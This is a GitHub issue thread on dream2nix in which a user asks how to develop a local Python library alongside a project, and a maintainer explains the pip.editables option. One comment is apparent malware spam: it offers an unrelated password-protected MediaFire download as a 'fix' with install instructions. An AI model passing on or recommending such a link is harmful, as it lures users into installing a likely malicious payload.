### ISSUE TITLE
Using local dependencies for development

### ISSUE THREAD

**Issue by bmoore01** [nix-community/dream2nix#1040]
Hey I'm trying to use dream2nix to build a python application, with a single application it works however. I have a library which I also develop which is used in one of my projects. Is it possible to set dream2nix to use my local copy of the library in a 'development mode' so that i can develop both of them on my machine in parallel?

The thing is at the moment everything is using `pip` and I don't want to move everything to nix right away so it would be nice if i can just have a devshell for one project which uses the local python dependancy.

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by phaer** [comment]
Hello,

I recently updated documentation on python development shells with pip a bit, see https://dream2nix.dev/guides/pip/#development-shells (if you haven't yet).

The devshell in that example would automatically include the generated [pip.editablesShellHook](https://dream2nix.dev/reference/WIP-python-pyproject/?#pipeditablesshellhook).

If you set [pip.editables](https://dream2nix.dev/reference/WIP-python-pyproject/?#pipeditables) i.e. `pip.editables.my_project = "/home/user/src/my_project";`, `my_project` will be added to your shell as an "editable install" as pip calls it. You need to use an absolute path outside nix store though, as anything inside the nix store would be immutable.

Does that help?
